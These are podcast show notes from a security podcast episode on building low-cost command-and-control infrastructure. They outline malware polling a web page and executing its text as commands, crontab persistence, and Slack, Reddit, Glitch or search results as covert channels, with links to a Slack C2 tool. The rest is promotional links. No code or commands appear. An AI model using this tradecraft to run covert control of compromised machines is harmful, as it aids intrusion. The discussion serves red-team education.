Sunday, March 17, 2019

2019-011-Zach_Ruble-building_a_better_cheaper_C2_infra


Shout-out to Thomas…

    Tried to meetup while at SEA comic-con

Patreon

Log-MD

Hacker’s Health - Ms. Roddie is at TROOPERS (Ms. Berlin?)

4 podcasts?

SpecterOps Training / workshopCon  - https://www.workshopcon.com/events

Zach Ruble- @sendrublez

C2 infra using Public WebApps

TARCE - Teaching Assistant RCE(?) - they run your code every week, don’t check for backdoors before running it...

C2 Basics

    Local HTTPd server (bashfile)

    Python scrapes web server

3 components

-Servers

-Communication channels

-Malware and client

-

3 Requirements of a C2

-victim receives commands

-Vic executes

-Send results back

Web server serving a static file

Malware on machine scraping site with python requests and executing it as commands.

Crontab @reboot

 

State change = change the text field

https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/

https://uwbacm.com/

 

Long haul/short haul server

Long haul - regain persistence

Short haul - sends commands to victims

 

Slack as C2 - Blends in to the Env

    Send and receive messages

    Using Real Time Messaging API

https://3xpl01tc0d3r.blogspot.com/2018/06/how-to-use-slack-as-c2-sever.html

https://link.springer.com/chapter/10.1007/978-3-319-27137-8_24

https://glitch.com/

Https://github.com/bkup/SlackShell

 

Reddit as a C2

    “Reddit Rising”

 

Glitch.com

    Serverless platform

 

Using Google search results as

    Would Google Algos see odd behavior of hundreds of hosts searching for the same thing?

Log file analysis?

    How can we protect against this?

C2 News (If we go short) :

https://www.zdnet.com/article/outlaws-shellbot-infects-servers-for-monero-mining

Automating OSINT

https://twitter.com/jms_dot_py

http://www.automatingosint.com/blog/

 

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotifyhttps://brakesec.com/spotifyBDS

#RSShttps://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloudhttps://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypalhttps://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter@brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec


Here is a new episode of Brakeing Down Security Podcast!

No comments: